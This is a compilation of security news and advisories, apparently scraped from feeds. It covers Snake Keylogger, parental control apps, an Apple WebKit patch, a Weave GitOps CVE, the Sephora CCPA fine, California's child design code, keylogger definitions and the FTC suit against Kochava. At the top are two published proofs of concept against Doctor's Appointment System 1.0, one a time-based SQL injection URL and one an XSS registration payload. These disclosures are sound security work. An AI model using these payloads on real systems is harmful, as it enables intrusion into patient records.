Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

    # Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

Doctor's Appointment System 1.0 SQL Injection

Doctor's Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.

    # Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36203POC:POST /register.php HTTP/1.1Host: localhostusername=a"><script>alert(1337)</script>&password=123

Doctor's Appointment System 1.0 Cross Site Scripting

By Waqas
The IP addresses used in the attack originated from Vietnam, while the campaign’s primary targets were located in the USA.
This is a post from HackRead.com Read the original post: Snake Keylogger Returns with New Malspam Campaign Targeting IT Firms

**Snake Keylogger** is back in action with a brand new malspam campaign spreading via phishing emails sent to corporate IT enterprises’ managers. Bitdefender Antispam Labs discovered the campaign on 23 August 2022.

**What is a Keylogger?**

A keylogger is a type of malicious software that records your keystrokes and sends them to a hacker. Keyloggers can be installed on your computer without your knowledge, usually through a malicious email attachment or infected website.

In some cases, attackers may use a physical keylogger on your device in shape of a **malicious USB drive** or a customized **phone charging cable**, etc.

**Campaign Analysis**

According to Bitdefender analysts, the IP addresses used in the attack originated from Vietnam, while the campaign’s primary targets were located in the USA, and thousands of inboxes have received the **phishing email**.

Attackers leverage the corporate profile of one of Qatar’s leading IT and cloud services providers to trap victims into opening a ZIP archive. This archive has an executable file titled “CPMPANY PROFILE.exe.”

This file, according to Bitdefender’s **blog post**, loads the notorious Snake Keylogger payload on the targeted system’s host. The data is exfiltrated through SMTP.

Screengrab: Bitdefender

**What is Snake Keylogger?**

It is an infamous credential and **info-stealing malware** that exfiltrates sensitive data from infected machines. It has screenshot capturing and keyboard logging capabilities. It is a huge threat to enterprises because of its spying and data harvesting features.

In addition to that, it can steal information from system clipboards. It is also called **404 Keylogger**. The trojan surfaced in 2020 and is currently available at underground marketplaces/message boards for a few hundred dollars. The malware is used commonly in financially motivated campaigns, including identity theft and fraud-based campaigns.

**How to Protect Yourself?**

A keylogger records every keystroke you make, giving hackers access to your personal information, passwords, and financial data. But there are steps you can take to protect yourself.

The best way to protect your device is by verifying the validity and origin of correspondence before clicking on any attachment. Also, install the industry’s most **reliable security solutions** and protect your accounts with 2FA or MFA processes.

1.  **US Warns Firms About North Korean Hackers Posing as IT Workers**
2.  **Cisco Confirms Breach After Employee’s Google Account was Hacked**
3.  **Twitter Confirms Data Breach as 5.4M Accounts Sold on Hacker Forum**
4.  **Hackers posing as LinkedIn recruiters to scam military, aerospace firms**
5.  **Hackers hit Europe’s largest healthcare provider with Snake ransomware**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Snake Keylogger Returns with New Malspam Campaign Targeting IT Firms

By Waqas
There are many different parental control apps available, so it is important to research which one will best fit the needs of your family.
This is a post from HackRead.com Read the original post: What is a parental control app and what are your options

A parental control app is a software application that parents can use to monitor their children’s activities on their smartphones. SMS, or short message service, is a way for parents to track their children’s text messages and see who they are communicating with. Smartphone parental control apps can also track the child’s location, restrict access to certain websites, and set time limits for app usage.

While some parents may feel comfortable trusting their children with a smartphone, others may want to have more control over what their children can do on their devices. For parents who want to monitor their child’s smartphone usage, a parental control app can be a helpful tool.

There are many different parental control apps available, so it is important to research which one will best fit the needs of your family. Here is a list of some of the parental control apps popular among users worldwide.

When it comes to keeping tabs on their children, parents have a lot of options these days. One such option is the mSpy parental control app. This app allows parents to track their child’s SMS messages, phone calls, and location. It can also be used to block certain apps and websites.

mSpy is a reliable and affordable option for parents who want to keep a close eye on their children’s activities. The app is easy to use and can be installed on most smartphones. Parents can also set up alerts so they’re notified if their child attempts to access something they’re not supposed to.

If you’re concerned about your child’s safety or want to make sure they’re not spending too much time on their phone, the mSpy parental control app is definitely worth considering.

**Google Family Link**

Did you know there is a parental control app offered by Google? Yes, Google Family Link is an app that helps parents manage their children’s online activity. It lets parents set up restrictions on what apps and websites their children can use, and also allows them to see how much time their children are spending on their devices.

Google Family Link can be a helpful tool for parents who want to make sure their children are staying safe online. The app is available for Android and iOS devices. Parents can also control the app on their web browser.

**Kidslox**

Kidslox is a parental control app that helps parents manage their children’s screen time. It allows parents to set limits on how much time their children can spend on devices, as well as what apps and websites they can access. Kidslox also has features that allow parents to monitor their children’s activity and whereabouts.

Kidslox is available for Android and iOS devices.

**Boomerang**

Boomerang is a parental control app that helps parents manage their children’s screen time. Boomerang lets parents set limits on how much time their children can spend on their devices, as well as track their child’s activity and internet usage.

Boomerang also provides parents with insights into their child’s online activity, helping them to better understand what their child is doing online. The app is available on App Store for iOS devices, on Google Play Store for Android devices, and on Galaxy Store as well.

**eyeZy**

The eyeZy parental app is a great way for parents to keep track of their children’s whereabouts and activities. The app is simple to use and easy to navigate, making it a great choice for anyone who wants to stay organized while they are away from home. The app includes features like an activity log, location history, and a message board where parents can communicate with each other.

**XNSPY**

The focus of the XNSPY application is mainly on parental control or monitoring a group of employees. It has a control panel designed to monitor various devices easily. Available in a version without root and with root; as well as without jailbreak and with jailbreak.

Seeing the functionality of this application, the general impression is that its developers designed it so that the user can monitor their company’s devices at the same time. Moreover, its control panel allows you to easily switch between all the devices added to the account.

**Choosing The Best Parental Control App**

When it comes to choosing parental control app, there are a few things you need to take into consideration. Here are some factors that you should look for:

*   **Ease of use**: The app should be easy to use and understand. Even if you’re not tech-savvy, you should be able to use it with ease.
*   **Reliability**: The app should be reliable and provide accurate information. You don’t want a parental control app that provides inaccurate information.
*   **Customer support**: If you run into any problems while using the app, you’ll want to ensure that customer support is available to help you.
*   **Value for money**: Make sure you’re getting an app worth the price. Some apps are expensive but don’t offer desired features. Choose an app that has an excellent price-to-feature ratio.
*   **Sharing Data:** Make sure that the app you are about to use does not store your data or sell it to the advertisement of malicious third parties. You must ensure your child’s data does not end up with an outsider.

1.  5 Ways to Ensure Your Child’s Online Safety
2.  Parents lose custody of kids after YouTube pranks
3.  Teen “Hackers” on Discord Selling Malware for Quick Cash
4.  Germany bans kids smartwatches, asks parents to destroy them
5.  Parental control spyware app Family Orbit hacked; 281 GB of data exposed

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

What is a parental control app and what are your options

Apple continues a staged update process to address a WebKit vulnerability that allows attackers to craft malicious Web content to load malware on affected devices.

Apple has quietly rolled out more updates to iOS to fix an actively exploited zero-day security vulnerability that it patched earlier this month in newer devices. The vulnerability, found in WebKit, can allow attackers to create malicious Web content that allows remote code execution (RCE) on a user's device.

An update released Wednesday, iOS 12.5.6, applies to the following models: iPhone 5S, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation.

The flaw in question (CVE-2022-32893) is described by Apple as an out-of-bounds write issue in WebKit. It was addressed in the patch with improved bounds checking. Apple acknowledged that the bug is under active exploit, and is urging users of affected devices to update immediately.

Apple had already patched the vulnerability for some devices — alongside a kernel flaw tracked as CVE-2022-32894 — earlier in August in iOS 15.6.1. That's an update that covered iPhone 6S and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

The latest round of patches appears to be Apple covering all its bases by adding protection for iPhones running older versions of iOS, noted security evangelist Paul Ducklin.

"We're guessing that Apple must have come across at least some high-profile (or high-risk, or both) users of older phones who were compromised in this way, and decided to push out protection for everyone as a special precaution," he wrote in a post on the Sophos Naked Security blog.

The dual coverage by Apple to fix the bug in both versions of iOS is due to the change in which versions of the platform run on which iPhones, Ducklin explained.

Before Apple released iOS 13.1 and iPadOS 13.1, iPhones and iPads used the same operating system, referred to as iOS for both devices, he said. Now, iOS 12.x covers iPhone 6 and earlier devices, while iOS 13.1 and later versions run on iPhone 6s and devices released after.

The other zero-day flaw that Apple patched earlier this month, CVE-2022-32894, was a kernel vulnerability that can allow for entire device takeover. But while iOS 13 was affected by that flaw — and thus got a patch for it in the earlier update — it does not affect iOS 12, Ducklin observed, "which almost certainly avoids the risk of total compromise of the operating system itself" on older devices, he said.

**WebKit: A Wide Cyberattack Surface**

WebKit is the browser engine that powers Safari and all other third-party browsers that work on iOS. By exploiting CVE-2022-32893, a threat actor can build malicious content into a website. Then, if someone visits the site from an affected iPhone, the actor can remotely execute malware on his or her device.

WebKit in general has been a persistent thorn in Apple's side when it comes to exposing users to vulnerabilities because it spreads beyond iPhones and other Apple devices to other browsers that use it — including Firefox, Edge, and Chrome — putting potentially millions of users at risk from a given bug.

"Remember that WebKit bugs exist, loosely speaking, at the software layer below Safari, so that Apple's own Safari browser isn't the only app at risk from this vulnerability," Ducklin observed.

Moreover, any app that displays Web content on iOS for purposes other than general browsing — such as in its help pages, its _"About"_ screen, or even in a built-in "minibrowser" — uses WebKit under the hood, he added.

"In other words, just 'avoiding Safari' and sticking to a third-party browser is not a suitable workaround \[for WebKit bugs\]," Ducklin wrote.

**Apple Under Attack**

While users and professionals alike have traditionally considered Apple's Mac and iOS platforms as more secure than Microsoft Windows — and this has generally been true for a number of reasons — the tide is beginning to turn, experts say.

Indeed, an emerging threat landscape showing more interest in targeting more ubiquitous Web technologies and not the OS itself has widened the target on Apple's back, according to a threat report released in January, and the company's defensive patching strategy reflects this.

Apple has patched at least four zero-day flaws this year, with two patches for previous iOS and macOS vulnerabilities coming in January and one in February — the latter of which fixed another actively exploited issue in WebKit.

Moreover, last year 12 of 57 zero-day threats that researchers from Google's Project Zero tracked were Apple-related (i.e., more than 20%), with issues affecting macOS, iOS, iPadOS, and WebKit.

Apple Quietly Releases Another Patch for Zero-Day RCE Bug

Weave GitOps Enterprise before 0.9.0-rc.5 has a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permission. The exposure appears in Weave GitOps Enterprise UI via a GitopsCluster dashboard link. An annotation can be added to a GitopsCluster custom resource.

Weave GitOps is a powerful extension to Flux, a leading GitOps engine and CNCF project, which provides insights into your application deployments, and makes continuous delivery with GitOps easier to adopt and scale across your teams.

The web UI surfaces key information to help application operators easily discover and resolve issues. The intuitive interface provides a guided experience to build understanding and simplify getting started for new users; they can easily discover the relationship between Flux objects and navigate to deeper levels of information as required.

Weave GitOps is an open source project sponsored by Weaveworks - the GitOps company, and original creators of Flux.

**Why adopt GitOps?​**

> "GitOps is the best thing since configuration as code. Git changed how we collaborate, but declarative configuration is the key to dealing with infrastructure at scale, and sets the stage for the next generation of management tools"

\- Kelsey Hightower, Staff Developer Advocate, Google.

Adopting GitOps can bring a number of key benefits:

*   Faster and more frequent deployments
*   Easy recovery from failures
*   Improved security and auditability

To learn more about GitOps, check out these resources:

*   GitOps for absolute beginners - eBook from Weaveworks
*   Guide to GitOps - from Weaveworks
*   OpenGitOps - CNCF Sandbox project aiming to define a vendor-neutral, principle-led meaning of GitOps.
*   gitops.tech - supported by Innoq

**Getting Started​**

See Installation and Getting Started

**Features​**

*   **Applications view** - allows you to quickly understand the state of your deployments across a cluster at a glance. It shows summary information from kustomization and helmrelease objects.
*   **Sources view** - shows the status of resources which are synchronizing content from where you have declared the desired state of your system, for example Git repositories. This shows summary information from gitrepository, helmrepository and bucket objects.
*   **Flux Runtime view** - provides status on the GitOps engine continuously reconciling your desired and live state. It shows your installed GitOps Toolkit Controllers and their version.
*   Drill down into more detailed information on any given Flux resource.
*   Uncover relationships between resources and quickly navigate between them.
*   Understand how workloads are reconciled through a directional graph.
*   View Kubernetes events relating to a given object to understand issues and changes.
*   Secure access to the dashboard through the ability to integrate with an OIDC provider (such as Dex) or through a configurable cluster user.
*   Fully integrates with Flux as the GitOps engine to provide:
    *   Continuous Delivery through GitOps for apps and infrastructure
    *   Support for GitHub, GitLab, Bitbucket, and even use s3-compatible buckets as a source; all major container registries; and all CI workflow providers.
    *   A secure, pull-based mechanism, operating with least amount of privileges, and adhering to Kubernetes security policies.
    *   Compatible with any conformant Kubernetes version and common ecosystem technologies such as Helm, Kustomize, RBAC, Prometheus, OPA, Kyverno, etc.
    *   Multitenancy, multiple git repositories, multiple clusters
    *   Alerts and notifications

CVE-2022-38790: Introduction | Weave GitOps

By Deeba Ahmed
Sephora claims it respects consumer privacy and "strives to be transparent about how their personal information is used" to improve customer experience.
This is a post from HackRead.com Read the original post: Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data

The world’s leading cosmetics and beauty products manufacturer Sephora will pay a fine of $1.2 million to settle claims with a California district court.

The fine was brought under the California Consumer Privacy Act (**CCPA**) 2018 after more than a hundred retailers were examined for compliance with the act. The law was implemented primarily to ensure consumers can control the kind of data businesses can collect.

**The Accusation**

The company allegedly breached the California Consumer Privacy Act by ignoring to inform its customers that it sold their data. The company also failed to honor consumer requests to avoid selling their data by using the opting-out feature on its website.

Furthermore, Sephora ignored customers’ requests who signed through a Global Privacy Control supporting browser/extension and didn’t want to sell their private data. Instead, it allowed third-party firms, including marketing, advertising, and data analytics companies, to access its customers’ online activities in exchange for their services.

To do so, third parties created profiles of customers and accessed personal data like their shopping cart items, device details, and location, **court documents** revealed. The court was further informed of the following:

> “Consumers are constantly tracked when they go online. Sephora, like many online retailers, installs third-party companies’ tracking software on its website and in its app so that these third parties can monitor consumers as they shop. Third parties track all types of data; in Sephora’s case, third parties can track whether a consumer is using a MacBook or a Dell, the brand of eyeliner that a consumer puts in their “shopping cart,” and even the precise location of the consumer.”

> “Some of these third-party companies create entire profiles of users who visit Sephora’s website, which the third parties then use for Sephora’s benefit. For example, the third party might provide detailed analytics information about Sephora’s customers and provide that to Sephora, or offer Sephora the opportunity to purchase online ads targeting specific consumers, such as those who left eyeliner in their shopping cart after leaving Sephora’s website. This data about consumers is frequently kept by companies and used for the benefit of other businesses, without the knowledge or consent of the consumer.”

**Sephora’s Response**

However, Sephora claims it respects consumer privacy and “strives to be transparent about how their personal information is used” to improve customer experience.

> “Sephora was not the target or victim of a data breach, and this agreement with the California Office of the Attorney General (“OAG”) does not constitute an admission of liability or fault by Sephora. We have always cooperated fully with the OAG and Sephora’s practices are already in compliance with the CCPA.”
> 
> Sephora

Furthermore, Sephora explained that it uses data “strictly for Sephora experiences” and that the CCPA doesn’t define SALE in its conventional sense. That’s because traditionally, Sale entails industry-wide implemented standard practices like cookies that allow the company to provide its customers “more relevant Sephora product recommendations,” customized shopping experiences, and advertisements.

Consumers can simply opt-out of this by “CA- Do Not Sell My Personal Information. The link is available on the Sephora website footer, the company said.

In a comment to Hackread.com, Yotam Segev, co-founder, and CEO of a cloud-native data security platform **Cyera** said that “What I find most interesting about the Sephora settlement is that it started with a spot-check audit of more than 100 retailers. This is the sort of thing that keeps security and risk professionals up at night.”

According to Segev, “Business leaders are tasked with finding ways to leverage data to create new revenue streams. Especially with the shift to remote work, permissive access and applications like Google Drive or Slack make it easy to access and spread information across a business.”

“The people or teams involved may have believed they were permitted to monetize this data. How many businesses are prepared for this kind of action? Security and risk teams need a simple way to answer basic questions like What data do I have? Where is it now? Who is accessing it? How should it be governed and secured? Those are questions you need answers to at your fingertips, not something to be found after a lengthy audit process following a security incident,” Segev emphasized.

**CCPA Details**

The law entails that Californian consumers are entitled to know what information a business can collect, how they can use it, and the option to delete the data a company collected from them.

For your information, the act applies to for-profit retailers doing business in California earning gross annual revenue of more than **$25 million** and also to companies that buy, sell, or receive the personal data of 50,000+ devices, residents, and households in California and derive over 50% of their annual revenues from selling the residents’ private data.

The settlement resulted from a year-long Enforcement Sweep channeled by California Attorney General Rob Bonta. He investigated Sephora and many other businesses to check if any of them breached the CCPA.

1.  **Cambridge Analytica scandal: Facebook hit with $1.6 million fine**
2.  **IT guy from FEMA hacked medical center, sold data on dark web**
3.  **Ticketmaster hacked a rival and now it’s paying a $10m fine for it**
4.  **Kids luxury clothing store Melijoe exposed 200GB of customers’ data**
5.  **How much does a data breach cost? + How to prevent it (Best practices)**

Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data

The California Age-Appropriate Design Code would launch a huge online privacy experiment. And it won’t just affect children.

No one would describe the internet as “kid-friendly.” Parents fret over how to keep their kids safe from the internet’s myriad dangers, from bullies to predators to surreptitious surveillance. A new California bill is poised to remove some of the burden from parents—and force tech companies to take more responsibility to protect kids online.

This week, the California legislature voted unanimously to pass the California Age-Appropriate Design Code Act. Once Governor Gavin Newsom signs the bill into law, the code will require sites and apps that serve users under 18 to “consider the best interests of children when designing, developing, and providing” their products. The ADCA could be the United States’ biggest step toward comprehensive online protections for kid users yet.

The ADCA comes amid growing scrutiny of the time kids spend online, what kind of data is collected about them, and how all that screen time might cause harm. Buffy Wicks, a Democrat spearheading the bill and parent of two young children, says the bill isn’t meant to clamp down on young people’s internet experience. “I am raising digital natives and children who are comfortable being online,” she says. “I feel it’s our moral obligation to keep them safe as they learn and grow.” Tech companies, on the other hand, are not financially incentivized to design a healthy, data-protective internet for kids.

The ADCA’s main pillars regulate the privacy policies of any company whose web products serve users under 18. These companies would be required to offer a high level of privacy for child users by default. If parents, say, don’t want their children to receive messages from a stranger over a social media platform, they shouldn’t have to click around for a tiny “settings” tab; that option should already be turned on. It also aims to give kids more digital agency over their internet exploration. Companies would be required to offer transparent information on their privacy policy in kid-friendly language and allow kids to log their privacy concerns with the company.

If enacted, the law would also impose stricter rules around what companies can and can’t do with kids’ personal information. Under the legislation, companies wouldn’t be able to collect or share data beyond what’s strictly necessary for the site to function. They would have to complete a “Data Protection Impact Assessment,” a survey that would basically force them to detail how kids’ data will be used. They would also have to disclose whether the product uses addictive design mechanisms, like autoplay or gamified nudges that reward spending more time on an app.

Most notably, the bill would apply to sites and apps that aren’t specifically directed at children, but are “likely to be accessed by” them. That means the regulatory controls will extend beyond the usual suspects of mobile games or teen social media hubs. The rules could apply to, among other sites, Google Search, retail sites, and news websites like this one. If a company violates the ADCA, they have 90 days to come up with a fix, or the California Attorney General’s office could exact a fine of up to $7,500 per affected child.

Supporters say that the ADCA would compel tech firms to proactively design products that protect children, rather than reacting to harms they’ve already inflicted. “It’s not meant to fix a problem after the fact,” says Nicole Gill, cofounder and executive director of the nonprofit Accountable Tech. “It’s meant to encourage design that is safe and healthy and fosters a safe experience online for kids.” Accountable Tech supports the bill, along with organizations like Common Sense, Fairplay, and the American Academy of Pediatrics, California.

The status quo for kid safety on the internet is universally disappointing. A recent study by software company Pixalate found that thousands of kid-directed apps transmit users’ GPS data and residential IP addresses to ad companies. The habit-forming nature of social media apps has raised concerns about the relationship between social media and teens’ mental health. The primary law governing kids’ privacy online is COPPA, the federal Children’s Online Privacy Protection Rule. But COPPA, which Congress has updated only a handful of times since 1998, has a limited reach: It applies only to sites and apps directed to children under the age of 13. The ADCA, which applies both to anyone under 18 _and_ to online products that are “likely to be accessed by children” but may not be specifically directed to children, would be far more expansive.

Some of the bill’s critics argue that the ADCA’s scope is overinclusive. Opponents include the video game trade group Entertainment Software Association and Technet, a group whose members include Google, Meta, and Snap. The News/Media Alliance has also lobbied against the bill, citing concerns that it would raise the cost of publishing news online. (Condé Nast, WIRED’s parent company, is a member, and its CEO sits on News/Media Alliance’s board.)

The bill outlines several indicators for what might constitute a site’s “likelihood” of being accessed by children, including some clear-cut indicators, such as whether a site features advertisements targeted to kids. But other indicators are ambiguous, like whether a site is “routinely assessed by a significant number of children.” (How often is “routine,” and what number is “significant”?)

Critics have particularly seized on the ADCA’s requirement that companies “estimate the age of child users with a reasonable level of certainty.” The bill itself does not lay out how companies ought to estimate the age of child users. So how could that work? Will online services start asking users to furnish driver's licenses or credit cards, as some critics have stated? Doesn’t estimating age invite _more_ data collection, not less?

Supporters of the bill say that age estimation methods don’t have to be invasive. A report from the 5Rights Foundation, which sponsored both the California and UK Design Codes, suggests that users could, for example, self-report birthdays, use a third-party age assurance provider, or complete a “capacity test” (solving a puzzle that helps indicate an age range). Companies that absolutely need to verify that their users are adults, like dating sites, would ask for hard identifiers like driver's licenses. Under the ADCA, companies will also be allowed to build a profile of all users’ online activity or keep the online profiles of users they already have—but these data profiles can be used only to estimate a user’s age. The age estimation profile cannot be kept longer than necessary or used in any other way. But it’s unclear how regulators would enforce these aspects of the statute.

The ADCA does include a carve-out, stipulating that if a site or app affords a high level of data protections (e.g., it doesn’t sell user data, doesn’t use targeted ads), it doesn’t need an age-estimation mechanism at all.

Let’s say there’s a website called Fake-website.com. If Fake-website.com is found to have a “significant” number of routine visitors who are teenagers, then it would be subject to regulatory control under the ADCA. At this point, Fake-website.com has two options: If it uses targeted ads or sells users data, then it would have to install an age estimation mechanism, like a prompt for users to enter their birthday, so that it does not offer targeted ads to users who identify themselves as under 18. Fake-website.com then can’t use the user data point (their birthday) in any other way, and must delete it as soon as possible. If it does not use targeted ads or sell users’ data, then there’s nothing more to be done. Supporters say that the relevant clause (”apply the privacy and data protections afforded to all children to all consumers”) is the heart of the bill, and the mechanism by which the ADCA could actually incentivize making the internet safer for all users.

That is, if it can be enforced. Others worry that the bill’s ambiguities, including the age estimation clause, are too vague to be implemented at all. “My guess is it will probably just be ignored by tech companies,” says Justin Brookman, the director of technology policy at nonprofit Consumer Reports. “It feels like sloppy policymaking.”

Supporters, however, say that the ambiguity is purposeful. The law will create a new regulatory agency tasked with hammering out the bill’s specifics, including the age-estimation requirement. It’s meant to work with companies on a case-by-case basis to determine how they might comply with the law, which would go into effect in July 2024.

The ADCA is not without precedent—the bill is modeled after similar UK legislation that went into effect in 2021. It’s unclear whether the UK Design Code has had much impact. It has yet to be enforced, despite being enforceable for a year. The country’s information commissioner, John Edwards, told Bloomberg that his office is “looking into how over 50 different online services are complying with the code.”

While Governor Newsom has not yet given a public stance on the ADCA, he’s expected to sign it, which he must do by the end of September. Once enacted, the bill could have further-reaching consequences than just the kids of California. Although the law is enforceable only for users and businesses based in California, companies might opt to offer higher data privacy protections for all kids, rather than geofencing protections for California. For example, when Europe passed GDPR, Microsoft chose to extend GDPR’s protections to all users.

As Wicks put it in a press conference on Tuesday: “It is my absolute hope that if this bill gets signed into law, it will become, effectively, the law of the land.”

The US May Soon Learn What a ‘Kid-Friendly’ Internet Looks Like

Categories: News
People are often confused as to where the security industry draws the line between something that is considered a keylogger and something that is not. Read on to learn what this term means, from a practical perspective.



(Read more...)




The post What is a keylogger? appeared first on Malwarebytes Labs.

A blog post published earlier this year posed the question "Is Grammarly a keylogger?" I have personally had people reference that post and ask me to add detection of Grammarly to Malwarebytes. The answer has always been, "no." Whether or not you like what Grammarly does, Grammarly is not a keylogger, according to the way that term is used by the security industry.

This begs the question: exactly what _is_ a keylogger, then?

**A keylogger is anything that logs keystrokes, right?**

Well, no. This is way too broad a definition, since there are countless programs installed on every computer on earth designed to capture and save your keystrokes. Any word processor, for example. For that matter, any productivity software, whether that be a word processor, a notepad, a spreadsheet, a slideshow app, etc. Even something as low level as a Terminal window will record everything you type in the command history.

Using a computer made in the last several decades is all about typing things in a keyboard, and some program doing something with all those button presses. There's a tongue-in-cheek saying about a common piece of advice for avoiding phishing attacks: you can't tell the user to stop clicking things on the thing-clicking machine. Similarly, if you're going to blow the whistle at anything that captures your keystrokes, you're fighting a losing battle.

**Is it something that sends your keystrokes somewhere?**

We're getting closer, but still no. Think about the things you use every day. A web browser, for example. Every time you type a search in a browser, what you type is sent off to the search engine of your choosing (most likely Google). Plus, there are tons of websites that will save things you type on the server. Consider Google docs, for example. Everything you type in such a document in your browser gets sent off to Google.

The web browser isn't the only guilty party, of course. Consider Apple's Notes app. Depending on your settings, everything you type in the Notes app will be synced to iCloud. The same is true of Microsoft's OneNote app. For that matter - again, depending on your settings - doing a Spotlight search on your Mac can send everything you type in the search bar to Apple.

This is clearly where Grammarly lies. It collects keystrokes and sends them off your device for the purpose of having their backend system check the grammar of what you typed. Would it be better if it could do all that on the device? Certainly, though I know nothing of the technical reasons why that decision was made. Would I personally use Grammarly? Not a chance. However, there are many people who need a grammar checker and like the features Grammarly offers.

Clearly, these things are all legitimate apps, offering legitimate functionality. This definition is still too broad to be useful.

**Then what IS a keylogger?**

A more useful definition would be:

> A keylogger is a program that collects keystrokes and sends them to a third-party, solely for the benefit of that third-party.

The key differentiator between a keylogger and something more legitimate is that it's not collecting your keystrokes for your benefit. Instead, someone else intends to use what you typed for some purpose of their own, nefarious or otherwise. However, within this definition, there are a few different types of keyloggers.

**"Potentially unwanted" keyloggers**

A keylogger may be identified as a "PUP" (which stands for "Potentially Unwanted Program") if it's software that is sold legally and openly. Such programs are often marketed as tools for monitoring your children or employees, and as such have a theoretical legitimate use. (I have some strongly negative opinions about the use of keylogging software for such purposes, but to each their own.)

However, such keyloggers are also very commonly misused. In reality, legitimate usage of such keyloggers is probably dwarfed by illegitimate usage. People with access to someone else's device can install them without the owner's knowledge for unsavory - even malicious - reasons. This is quite common with intimate partner abuse, stalking, workplace harassment, etc.

For this reason, most security software will detect these so-called "legitimate" keyloggers as PUPs. Malwarebytes, as a member of the Coalition Against Stalkerware, is certainly no exception.

**Adware keyloggers**

These keyloggers are things that collect keystrokes within certain contexts for the purposes of targeting you with ads, building a profile to better understand you as a target for ads, or as a means of better understanding the entire customer base. An example of the type of data that such a program might collect would be every search you enter in your browser and every site you visit (whether that's by typing the address in the address bar or clicking a link). Such programs often go well beyond just logging keystrokes, and will collect things such as your browser history, browser of choice, software installed on your computer, your location, etc.

These programs will generally trick the user into installing them, using a variety of lures. The old fake Adobe Flash Player installer trick is one of the most common, even now, when Flash is long dead. Generally speaking, though, these are spread in the form of trojans: ie, programs the user is tricked into downloading and running.

Such programs are either malware or just shy of malware, depending on your definition. Either way, they serve no legitimate purpose for anyone other than shady advertisers and deserve to be deleted with extreme prejudice. The only good news is that it is not the intent of these programs to harm you (though poor data handling practices by shady adware companies definitely could cause harm regardless of intent).

**Malicious keyloggers**

The most concerning category of keyloggers. These are the ones without any supposed "legitimate" purpose, and are intended for nothing but to steal your information. Such keyloggers are often used to collect sensitive information, such as account credentials, credit card numbers, social security numbers, and more.

Malicious keyloggers get onto your machine through a variety of means. They could be trojans, often using a lure more convincing than a fake Flash installer. They could infect your machine through a browser vulnerability that allows arbitrary code to execute. (This is less common on Macs than on Windows, but is nonetheless an increasing problem for Mac users.)

Such malware has also been known to have been installed manually, by attackers who have gotten access to the machine somehow, via physical or remote access. In a well-known case, the creator of the FruitFly malware is known to have used passwords obtained from data breaches to gain access to victims' Macs. He used a process called "credential stuffing," in which a password obtained from one online account is used to attempt to log in to something else. Since so many people reuse passwords, this is unfortunately a fairly reliable strategy.

In the case of malicious keyloggers, the software is rarely limited to just capturing keystrokes. Most malicious spyware has keylogging capabilities as only a part of the complete package, also including - among other things - file collection, capture of the screen contents, capture of video and audio via the webcam and microphone, and even execution of arbitrary commands. Thus, most such malware is not referred to as a "keylogger," but rather is called "spyware."

**How do I protect myself from keyloggers?**

Obviously, one way to do so is to use some kind of antivirus software, such as Malwarebytes. If you think you might be being targeted by someone using a PUP keylogger, make sure that the software you use detects such software. Membership in the Coalition Against Stalkerware would be a good indication of that.

You can avoid some of the common means that attackers may use to install a keylogger on your device by making sure you use a strong login password on your computer. Make sure it's one that nobody could guess, and don't leave your computer logged in and unattended. If you need to share your computer with someone, don't let them use your account on the computer. Instead, create a separate account for that person and do not give them admin privileges. (On a Mac, this can be done in **System Preferences** -> **Users & Groups**.)

When it comes to the more malicious stuff, be careful about what you download. If a website tells you that you need to install something to see its content, or tells you that you're infected and that you need to install something to fix it, run away screaming. (If you're in a public place, you may want to consider just closing the browser window, though; otherwise you may get strange looks.)

It's also critically important to keep your system up-to-date. Doing so ensures that your system is protected against known vulnerabilities that could be used to infect your device. On a Mac, go to **System Preferences** -> **Software Update** and check the box reading **Automatically keep my Mac up to date.**

Doing these things is never a guarantee, but they will go a long way towards reducing the chances of ever being affected by a keylogger.

What is a keylogger?

Categories: News
Categories: Privacy
Tags: Kochava

Tags:  FTC

Tags:  sensitive locations

Tags:  data broker

The FTC has filed a complaint against data broker Kochava for selling sensitive location data.



(Read more...)




The post Data broker sued for allegedly selling individuals' sensitive location data appeared first on Malwarebytes Labs.

The Federal Trade Commission (FTC) has sued data broker Kochava for allegedly selling information that would allow for individuals’ whereabouts to be traced to sensitive locations. The information included location data from hundreds of millions of phones, including sensitive locations that could be tied to an individual.

And, while the name Kochava may not ring any bells, it actually has a sizeable footprint in the data collection industry. In its own words, Kochava is the industry leader for mobile app attribution and mobile app analytics, and its platform provides a comprehensive set of measurement and targeting tools for app marketers.

While we are all more or less aware that advertisers spend a lot of money to enhance their targeted advertising strategies, there are boundaries to what the FTC will allow.

**Buy and sell**

Kochava is a location data broker that provides precise geolocation data from consumers’ smartphones and also purchases similar data sets from other brokers in order to resell them to clients. These data feeds are often used by clients who want to analyze things like foot traffic at local stores or other locations. Not only does it show the exact location of mobile devices, they are also associated with a unique identifier, like a device ID, as well as other information, like an IP address, device type and more.

